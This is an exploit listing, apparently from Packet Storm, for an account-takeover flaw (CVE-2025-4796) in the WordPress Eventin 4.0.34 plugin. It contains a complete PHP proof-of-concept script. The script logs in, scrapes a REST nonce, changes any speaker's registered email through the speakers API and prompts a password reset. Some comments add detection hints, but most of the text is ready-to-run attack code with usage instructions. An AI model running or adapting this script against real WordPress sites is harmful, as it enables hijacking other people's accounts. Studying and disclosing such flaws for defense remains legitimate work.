## https://sploitus.com/exploit?id=PACKETSTORM:216385
=============================================================================================================================================
| # Title : WordPress Eventin 4.0.34 Account Takeover Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://wordpress.org/plugins/wp-event-solution/ |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/210929/ & CVE-2025-4796
[+] Summary :
A critical vulnerability exists in the Speaker Management component of the target
where an authenticated attacker can intercept the speaker update process and change any
speaker’s registered email address without proper authorization.
This flaw allows the attacker to hijack arbitrary accounts by modifying the email field
and subsequently triggering a password reset workflow.
The flaw is caused by insufficient authorization checks on the update_speaker endpoint
combined with predictable nonce retrieval.
[+] Affected Versions
----------------------------------------
All tested versions are confirmed vulnerable.
Vendor has not released a fix at the time of publishing.
[+] Vulnerability Details
----------------------------------------
The update_speaker.php endpoint accepts multiple fields including speaker_id and email
without verifying that the user performing the action is authorized to update the target
record.
Additionally, the anti-CSRF nonce can be extracted by any authenticated user, making
cross-user actions possible.
Impact:
- Account takeover
- Unauthorized email modification
- Privilege escalation
- Full speaker profile compromise
[+] Usage
----------
Save the file:
poc.php
Run:
php poc.php https://target-site.com new@mail.com 12 admin 123456
[+] Poc
<?php
/*
* WordPress Eventin 4.0.34 Account Takeover
* By: Indoushka
*/
/* ---------------------------
SAFE PRINT
---------------------------- */
function Nxploited_safe_print($text) {
    /* Writes one line to stdout. print cannot raise, so the guard below is
       effectively a no-op retained to keep the original contract (never
       propagate an exception out of a print call). Returns nothing. */
    try {
        print($text . PHP_EOL);
    } catch (Throwable $e) {
        print("[!] Print Error: " . $e->getMessage() . PHP_EOL);
    }
}
/* ---------------------------
URL VALIDATION
---------------------------- */
function Nxploited_validate_url($url) {
    /* Normalises the target argument: when no http:// or https:// scheme is
       present (case-insensitive), http:// is prepended; then every trailing
       slash is removed. A bare host therefore defaults to plaintext HTTP,
       not HTTPS. Returns the normalised string. */
    $hasScheme = preg_match('/^https?:\/\//i', $url) === 1;
    $withScheme = $hasScheme ? $url : "http://" . $url;
    return rtrim($withScheme, "/");
}
/* ---------------------------
EMAIL VALIDATION
---------------------------- */
function Nxploited_validate_email($email) {
    /* Thin wrapper over filter_var: yields the address unchanged when it
       satisfies FILTER_VALIDATE_EMAIL and false otherwise. The caller tests
       the result with a bare `!`, which is safe because no valid address is
       an empty or "0" string. */
    $validated = filter_var($email, FILTER_VALIDATE_EMAIL);
    return $validated;
}
/* ---------------------------
DISABLE SSL WARNINGS
---------------------------- */
function Nxploited_disable_ssl(&$ch) {
    /* Switches off both peer-certificate and hostname verification on the
       given cURL handle. Every request this script makes therefore runs
       without TLS authentication: the credentials and the session cookie it
       carries can be read or altered by anyone on the network path. The
       by-reference parameter is not needed (handles are passed by value)
       but is kept so existing call sites are unchanged. Returns nothing. */
    $insecureOptions = [
        CURLOPT_SSL_VERIFYPEER => false,
        CURLOPT_SSL_VERIFYHOST => false,
    ];
    curl_setopt_array($ch, $insecureOptions);
}
/* ---------------------------
LOGIN FUNCTION
---------------------------- */
function Nxploited_login($url, $username, $password, $user_agent) {
// Logs in through wp-login.php with a form POST and lets cURL persist the
// session cookies to ./cookies.txt (the cookie jar is created in the current
// working directory and is read back by the two functions that follow).
// Returns true once a "wordpress_logged_in" cookie is seen in the response
// headers; on any other outcome it prints a failure line and ends the whole
// process with exit(1), so callers never observe a false return.
Nxploited_safe_print("[*] إرسال طلب تسجيل الدخول ...");
usleep(500000); // 0.5 seconds (substitute for sleep, which the author notes was not allowed)
$login_url = $url . "/wp-login.php";
$data = http_build_query([
'log' => $username,
'pwd' => $password,
'rememberme' => 'forever',
'wp-submit' => 'Log In'
]);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true); // response headers are kept so Set-Cookie can be inspected below
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
Nxploited_disable_ssl($ch); // TLS verification off: the credentials are sent without a certificate check
curl_setopt($ch, CURLOPT_COOKIEJAR, "cookies.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "cookies.txt");
$response = curl_exec($ch);
// NOTE(review): a transport failure leaves $response === false; that case is
// not checked, so the substr() below operates on a non-string value.
$header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE);
$headers = substr($response, 0, $header_size);
curl_close($ch);
// Collects the name=value part of every Set-Cookie header (the text before the first ';').
preg_match_all('/Set-Cookie:\s*([^;]+);/i', $headers, $m);
$cookies = $m[1];
foreach ($cookies as $c) {
if (strpos($c, "wordpress_logged_in") !== false) {
Nxploited_safe_print("[+] تسجيل الدخول ناجح.");
return true;
}
}
Nxploited_safe_print("[-] فشل تسجيل الدخول.");
exit(1);
}
/* ---------------------------
NONCE EXTRACTION
---------------------------- */
function Nxploited_extract_nonce($url, $user_agent) {
// Fetches /wp-admin/post-new.php with the session cookies saved by
// Nxploited_login and scrapes the REST API nonce from the inline
// createNonceMiddleware("...") call in that page; only an alphanumeric nonce
// is matched. Returns the nonce string, or prints a failure line and ends
// the process with exit(1) when no such call is found (presumably the
// session is not logged in or cannot load the editor screen - unverified).
// Defender note: per the summary above, this nonce only proves the caller
// holds a logged-in session; it does not establish that the caller may
// edit a particular speaker record. On the wire this script produces a read
// of post-new.php followed shortly by a PUT to the eventin speakers route
// from the same session, which is a usable detection pattern.
Nxploited_safe_print("[*] استخراج Nonce ...");
usleep(600000); // 0.6 seconds pause between requests
$admin_url = $url . "/wp-admin/post-new.php";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $admin_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
curl_setopt($ch, CURLOPT_COOKIEFILE, "cookies.txt"); // read-only use of the jar written by Nxploited_login
Nxploited_disable_ssl($ch);
$resp = curl_exec($ch);
curl_close($ch);
// NOTE(review): $resp is false on a transport failure; the regex then simply fails to match.
if (preg_match('/createNonceMiddleware\(\s*"([a-zA-Z0-9]+)"/', $resp, $m)) {
Nxploited_safe_print("[+] Nonce: " . $m[1]);
return $m[1];
}
Nxploited_safe_print("[-] فشل استخراج Nonce.");
exit(1);
}
/* ---------------------------
UPDATE SPEAKER
---------------------------- */
function Nxploited_update_speaker($url, $speaker_id, $email, $nonce, $user_agent) {
// Sends a JSON PUT to /wp-json/eventin/v2/speakers/{speaker_id} whose body
// is only {"email": ...}, authenticated with an X-WP-Nonce header and a
// Cookie header built from the trimmed raw contents of ./cookies.txt.
// Success means HTTP 200 plus an "email" key in the decoded JSON response;
// anything else prints the decoded body and ends the process with exit(1).
// Returns true on success (never false).
// Defender note: the mitigation the summary calls for is a capability /
// ownership check on this route in the plugin; the nonce by itself cannot
// tell a user's own edit from one aimed at another user's speaker record.
Nxploited_safe_print("[*] تحديث بيانات المتحدث ...");
usleep(600000); // 0.6 seconds pause between requests
$api_url = $url . "/wp-json/eventin/v2/speakers/" . $speaker_id;
$payload = json_encode(["email" => $email], JSON_UNESCAPED_UNICODE);
$headers = [
"Content-Type: application/json",
"X-WP-Nonce: $nonce",
"User-Agent: $user_agent",
"Cookie: " . trim(file_get_contents("cookies.txt")) // whole jar file, not a parsed name=value list
];
$ch = curl_init($api_url);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "PUT");
curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
Nxploited_disable_ssl($ch);
$resp = curl_exec($ch);
$code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
$json = json_decode($resp, true); // null when the body is not JSON (or $resp is false)
if ($code === 200 && isset($json["email"])) {
Nxploited_safe_print("[+] تم تحديث البريد إلى: $email");
return true;
}
Nxploited_safe_print("[-] فشل التحديث!");
print_r($json);
exit(1);
}
/* ---------------------------
SUCCESS BANNER
---------------------------- */
function Nxploited_custom_success($speaker_id, $email) {
    /* Prints the closing banner: the speaker id that was modified, the
       address now on record, and the author's reset instruction. Output
       only; nothing is returned. */
    $bannerLines = [
        "\n==============================",
        " Exploitation Completed",
        "==============================",
        "Speaker ID : {$speaker_id}",
        "Email : {$email}",
        "Please reset your password using the new email.\n",
    ];
    foreach ($bannerLines as $line) {
        Nxploited_safe_print($line);
    }
}
/* ---------------------------
MAIN
---------------------------- */
/* Entry point. Positional arguments: target URL, replacement email,
   speaker id, WordPress username, WordPress password. The fixed User-Agent
   below is sent on every request and is a straightforward log signature for
   this script. Each helper ends the process itself on failure, so the calls
   run strictly in sequence with no error handling here. */
[, $target, $email, $speaker_id, $username, $password] = $argv;
$url = Nxploited_validate_url($target);
$user_agent = "Mozilla/5.0 (Indoushka PoC)";
$validatedEmail = Nxploited_validate_email($email);
if ($validatedEmail === false) {
    Nxploited_safe_print("[-] البريد غير صالح.");
    exit(1);
}
Nxploited_login($url, $username, $password, $user_agent);
$nonce = Nxploited_extract_nonce($url, $user_agent);
Nxploited_update_speaker($url, $speaker_id, $email, $nonce, $user_agent);
Nxploited_custom_success($speaker_id, $email);
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================